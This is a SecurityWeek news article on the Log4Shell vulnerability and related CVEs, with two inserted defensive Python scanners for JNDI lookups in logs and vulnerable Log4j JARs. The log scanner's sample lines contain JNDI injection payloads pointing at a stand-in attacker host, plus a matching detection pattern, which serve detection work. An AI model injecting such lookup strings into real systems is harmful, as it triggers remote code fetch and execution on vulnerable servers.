Problematic Log4j Functionality Disabled as More Security Issues Come to Light

Developers of the widely used Apache Log4j Java-based logging tool have disabled problematic functionality as more security issues have come to light.

It was discovered recently that Log4j version 2.x is affected by a critical remote code execution vulnerability that can be easily exploited to take complete control of a system. The flaw is tracked as CVE-2021-44228, Log4Shell and LogJam, and it has been exploited in attacks since December 1, days before an official patch was released.

Log4Shell attacks have been launched by profit-driven cybercriminals to deliver DDoS malware, cryptocurrency miners, ransomware, and other malicious programs, as well as by Chinese and Iranian state actors.

New Log4j vulnerabilities

Exploitation of the vulnerability involves sending a specially crafted request to the targeted system. The request generates a log using Log4j, which leverages the Java Naming and Directory Interface (JNDI) lookup feature to perform a request to an attacker-controlled server, from which a malicious payload is fetched and executed.
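The exploitation path just described leaves a recognizable trace in whatever gets logged: the JNDI lookup string itself. The following Python example, added here and not part of the article or of the Log4j project, shows the defender's side of that mechanism. It scans a handful of constructed web-server access log lines (the client addresses and the attacker host are documentation-range addresses, not real indicators) for a lookup string, percent-decoding each line first so that lookups hidden in URL-encoded query strings are also seen, and reports the protocol scheme each lookup targets.

```python
import re
from urllib.parse import unquote

# Constructed sample access log lines in common log format (not real traffic).
# Line 1 carries a lookup in the User-Agent field, line 2 carries one URL-encoded
# in the query string, line 3 is a benign "${...}" that must not be flagged.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:00:03 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '203.0.113.2 - - [10/Dec/2021:10:00:04 +0000] "GET /docs HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (price ${USD})"',
]

# A Log4j JNDI lookup has the shape ${jndi:<scheme>:...}; capture the scheme so the
# finding says which protocol (ldap, rmi, dns, ...) the lookup would have used.
JNDI_LOOKUP = re.compile(r"\$\{jndi:([a-z][a-z0-9+.-]*):", re.IGNORECASE)


def find_jndi_lookups(line: str) -> list:
    """Return the lower-cased schemes of every JNDI lookup string found in one log line.

    The line is percent-decoded first: a web server logs the request line as
    received, so a lookup placed in the query string arrives URL-encoded.
    """
    decoded = unquote(line)
    return [m.group(1).lower() for m in JNDI_LOOKUP.finditer(decoded)]


def scan_log(lines) -> list:
    """Scan an iterable of access log lines and return one finding per hit.

    Each finding records the zero-based line index, the client address (first
    field of the common log format) and the lookup schemes seen on that line.
    """
    findings = []
    for idx, line in enumerate(lines):
        schemes = find_jndi_lookups(line)
        if schemes:
            findings.append({"line": idx, "client": line.split(" ", 1)[0], "schemes": schemes})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG_LINES):
        print(f"line {f['line']}: client {f['client']} sent JNDI lookup via {', '.join(f['schemes'])}")
```

Two points for anyone adapting this. First, because the lookup is expanded wherever Log4j formats the string, any request field that ends up in a log message is a candidate, not just the User-Agent header, so run the check over whatever your application actually logs. Second, a string match is a first-pass indicator: treat a hit as a reason to look for a corresponding outbound connection from the host to an unexpected LDAP or RMI endpoint, which is the observable side effect of a lookup that actually fired.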

CVE-2021-44228 was patched on December 6 with the release of Log4j 2.15.0. However, it was soon discovered that the fix was incomplete in certain non-default configurations, and exploitation could still lead to denial-of-service (DoS) attacks “or worse.”

A new CVE identifier, CVE-2021-45046, was assigned to this issue, and another round of updates was released. The latest versions of Log4j — versions 2.12.2 and 2.16.0 — not only patch this vulnerability, but also completely remove the message lookups feature and disable access to JNDI by default.

“JNDI lookups will now return a constant value. Also, Log4j now limits the protocols by default to only java,” Log4j developers said.

It has also come to light that while the risk of attacks against Log4j version 1.x is lower, systems running this version are still vulnerable to attacks if JNDI is used in their configuration. CVE-2021-4104 has been assigned to this issue, and while patches will not be released because version 1.x is no longer supported, mitigations are available.
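The three preceding paragraphs give a defender what they need to triage an inventory: 2.16.0 and 2.12.2 are the releases that remove message lookups and disable JNDI, and 1.x is a separate case that depends on configuration rather than on a patch. The following Python example, added here and not code from the article, from Risk Based Security or from the Log4j project, turns that into a scanner over a directory of JAR/WAR/EAR files. It reads the version from Maven's pom.properties inside each archive, recurses into bundled JARs (the third-party components the Wiz quote below warns about), and classifies each one. The 2.x thresholds are exactly the versions the article names; the check for the presence of JndiLookup.class reflects the documented mitigation of removing that class from unpatched 2.x JARs; the sample archives are constructed in a temporary directory for the demonstration and contain no real Log4j bytecode.

```python
import io
import os
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
CORE_POM = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
V1_POM = "META-INF/maven/log4j/log4j/pom.properties"
# Releases the article names as carrying the complete fix: 2.16.0 and the 2.12.2 backport.
FIXED_2X, FIXED_212X = (2, 16, 0), (2, 12, 2)


def parse_version(text: str):
    """'2.14.1' -> (2, 14, 1); None if the string does not start with x.y.z."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", text.strip())
    return tuple(int(x) for x in m.groups()) if m else None


def version_from_pom(zf: zipfile.ZipFile, pom_path: str):
    """Read the 'version=' line of a Maven pom.properties entry, if the archive has one."""
    if pom_path not in zf.namelist():
        return None
    for raw in zf.read(pom_path).decode("utf-8", "replace").splitlines():
        if raw.startswith("version="):
            return parse_version(raw.split("=", 1)[1])
    return None


def classify(zf: zipfile.ZipFile) -> str:
    """Classify one open archive against the versions the article describes."""
    names = set(zf.namelist())
    v2 = version_from_pom(zf, CORE_POM)
    if v2:
        fixed = v2 >= (FIXED_212X if v2[:2] == (2, 12) else FIXED_2X)
        if fixed:
            return "fixed"
        # An unpatched 2.x JAR with JndiLookup.class deleted has had the lookup
        # mitigation applied; with the class still present it is exploitable.
        return "vulnerable" if JNDI_LOOKUP_CLASS in names else "mitigated-jndilookup-removed"
    if version_from_pom(zf, V1_POM):
        # CVE-2021-4104: 1.x is unsupported and exposed only if JNDI is configured.
        return "log4j-1.x-review-jndi-config"
    if JNDI_LOOKUP_CLASS in names:
        return "unknown-version-jndilookup-present"   # shaded/repackaged build, no pom
    return "no-log4j"


def scan_archive(source, label: str, results: dict) -> None:
    """Classify an archive and recurse into every .jar it bundles (WEB-INF/lib etc.)."""
    with zipfile.ZipFile(source) as zf:
        results[label] = classify(zf)
        for name in zf.namelist():
            if name.endswith(".jar"):
                scan_archive(io.BytesIO(zf.read(name)), f"{label}!{name}", results)


def scan_tree(root) -> dict:
    """Walk a directory tree and return {archive label: classification}."""
    results = {}
    for path in Path(root).rglob("*"):
        if path.suffix in {".jar", ".war", ".ear"}:
            scan_archive(path, str(path.relative_to(root)), results)
    return results


def _write_jar(target, entries: dict) -> None:
    with zipfile.ZipFile(target, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)


def build_constructed_samples(root: str) -> None:
    """Constructed sample archives for the demonstration (no real Log4j classes inside)."""
    _write_jar(os.path.join(root, "log4j-core-2.14.1.jar"), {CORE_POM: "version=2.14.1\n", JNDI_LOOKUP_CLASS: b""})
    _write_jar(os.path.join(root, "log4j-core-2.16.0.jar"), {CORE_POM: "version=2.16.0\n"})
    _write_jar(os.path.join(root, "log4j-core-2.14.1-stripped.jar"), {CORE_POM: "version=2.14.1\n"})
    _write_jar(os.path.join(root, "log4j-1.2.17.jar"), {V1_POM: "version=1.2.17\n"})
    inner = io.BytesIO()                       # a 2.12.1 JAR hidden inside a WAR
    _write_jar(inner, {CORE_POM: "version=2.12.1\n", JNDI_LOOKUP_CLASS: b""})
    _write_jar(os.path.join(root, "app.war"), {"WEB-INF/lib/log4j-core-2.12.1.jar": inner.getvalue()})


def demo() -> dict:
    """Build the constructed samples in a temp directory and scan them."""
    root = tempfile.mkdtemp()
    build_constructed_samples(root)
    return scan_tree(root)


if __name__ == "__main__":
    for label, status in sorted(demo().items()):
        print(f"{status:36} {label}")
```

To run it against a real host, call scan_tree on the application root or the container image's filesystem instead of demo(). The nested-archive recursion is what catches the case in the Wiz quote: a WAR whose own code is not Java-heavy but which bundles a vulnerable log4j-core under WEB-INF/lib is reported as two entries, the outer archive as "no-log4j" and the inner JAR as "vulnerable".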

Risk Based Security has analyzed the three CVEs and noted that CVE-2021-4104 is an “entirely different attack vector.”

The security firm pointed out that assigning a separate CVE to the incomplete fix for CVE-2021-44228 may be helpful to some organizations, but it can also cause confusion.

As companies scramble to assess impact, threat actors are increasingly exploiting the Log4Shell vulnerability in their attacks, and many organizations appear to be exposed.

“Wiz research shows that more than 89% of all environments have vulnerable Log4j libraries,” Ami Luttwak, co-founder and CTO of cloud security company Wiz, told SecurityWeek. “And in many of them, the dev teams are sure they have zero exposure — and are surprised to find out that some third-party component is actually built using Java.”

Check Point reported seeing more than one million attack attempts, nearly half of which have been linked to known malicious groups. The company said it had seen exploitation attempts against 44% of corporate networks around the world.

SecurityWeek has compiled a list of tools and other resources that can be useful for defenders concerned about the impact of the Log4Shell vulnerability on their organization.

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
